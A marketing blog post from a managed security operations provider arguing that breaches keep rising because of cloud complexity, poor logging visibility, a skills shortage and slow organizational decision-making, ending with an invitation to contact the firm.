Cybersecurity anno 2022: an inconvenient truth.

The unfortunate and inconvenient truth is that, through our experience of running a Security Operations Center (SOC) for multiple customers, we witnessed a relatively steep increase in the number of attacks, targeted and as part of widespread campaigns alike, over the past two years. And with the increased number of attacks, we also saw a raise in the number of successful breaches.

Despite a common understanding about the importance of cybersecurity, too many organizations fail to live up to expectations to adequately protect their environment and, thus, are susceptible to a myriad of threats. 

The reasons for why this is still possible anno 2022 are not as surprising as you might think… 

Complexity and speed of evolution 

For years, software vendors have praised the many benefits of ‘the cloud’ whereby most, if not all, of the cumbersome tasks related to maintaining these apps and services are offloaded to the vendor or service provider. Rightfully so, customers have willingly accepted this new reality. They falsely assumed a vendor’s effort are sufficient to keep malicious actors away, and have failed to recognize and properly take care of their own responsibilities in the process. As such, these past couple of years have fostered an increasing attack surface which malicious actors are more than happy to exploit whenever possible.  

A good example hereof is Office 365. Microsoft takes care of securing datacenters and the applications (from a code perspective). From there, however, anything that happens within a customer’s environment or through the integrations they build is the customer’s responsibility. 

The flexibility of many solutions means that plenty of custom integrations have been built. These integrations take many forms. Some applications are configured to leverage authentication capabilities from a cloud Identity Provider (like Azure AD), others access and exchange data between platforms and apps. Regardless of the purpose of the customization(s) and integration(s), they typically create a complex IT landscape akin to traditional on-premises environments whereby many servers, applications, and (cloud) platforms are interconnected and rely on one another for proper functioning. 

This increased complexity makes it sometimes hard to keep track of the dependencies, the configuration, and the evolution thereof, especially considering that cloud platforms and services tend to evolve much faster than more traditional applications; new capabilities and functionalities need to be managed properly to ensure they do not have an adverse effect on the security posture of your environment – especially when app vendors do not always maintain security best practices themselves!

This is also one of the reasons why (Cloud) Security Posture Management (CSPM) solutions have become increasingly more popular. Even though they help keeping track of the configuration of one’s environment, little to no solutions have the ability to keep track of the full landscape, often focusing on only specific aspects of an environment, or specific (major) vendor platforms. Further fueling another challenge: the lack of visibility. 

Lack of visibility 

We often engage with customers that take their first steps towards a more structured approach into detecting and responding to security incidents. An organization’s first steps are often accompanied with a sudden realization there is little visibility into what is happening within their environment. All too often, basic logging policies or retention of important security logs are missing, giving specific threats and vulnerabilities free rein by making the detection and remediation thereof a lot harder, if not almost impossible.  

A few recent example that come to mind are the stream of vulnerabilities that Microsoft’s Exchange Server had to endure in 2021, and the more recent Log4j vulnerability. Through various engagements with new customers, we noticed that it was very hard to perform initial investigations and forensics as lots of useful information was missing, or was never recorded in the first place. The result thereof is that a lot of time is lost looking for clues that are well hidden within the dark places of one’s environment.  

Unfortunately, just enabling more logging won’t solve the majority of the cybersecurity challenges. However, a basic logging hygiene that ensures a minimum of events and activities is captured, can make the difference between being able to quickly detect when something is wrong, rather than having to wait for the sudden impact of exfiltrated data or encrypted endpoints. 

Lack of skills 

According to the 2021 ISC2 Cybersecurity Workforce Study, there is a staggering shortage of skilled cybersecurity professionals. ISC2 estimates that, currently, there is a shortage of about 72 million professionals, and that number is likely only to go up in the future. In reality this translates into long hiring cycles and organizations that just don’t have the in-house knowledge or bandwidth to deal with all the activities that are required to maintain a health security posture.  

Whereas hiring external expertise, such as what The Collective provides, can help overcome specific challenges, it’s still important for organizations to have sufficient in-house knowledge to help steer the security strategy and ensure proper follow-up of cybersecurity activities, both from internal and external resources. 

Lack of agility and decisiveness 

Perhaps the most striking reason for why organizations are having a hard time maintaining and improving their security posture is the inability to make important decisions within a reasonable time frame. When a new critical vulnerability hits the news, time is of the essence. There should be no place for corporate politics, long discussions, and lengthy implementation periods. This doesn’t mean that there is no room for controlled validation of changes and the need for a process to streamline the necessary activities. 

Malicious actors don’t keep a 9-to-5 mentality and certainly don’t care about one’s internal processes, etc. You should assume that any opportunity to exploit a weakness in your defenses will be used. To keep up with the fast pace of ever-changing landscape, organizations must be more agile to address specific and ongoing cybersecurity needs. When new vulnerabilities are discovered, patching shouldn’t take too long. Updating policies and other security configurations which reduce the attack surface of an environment should be a given, not an option. 

To be able to support this more agile approach to security, necessary processes should be in place and time and effort should be spent into ensuring that end users are properly assisted with changes that impact their experience or require them to respond to events as they unfold.

Time to reach out? 

At The Collective, we can help you overcome these challenges regain control over your security posture. Want to know more about how we can help you secure your environment, increase visibility and respond to threats? Don’t hesitate to reach out.

get in touch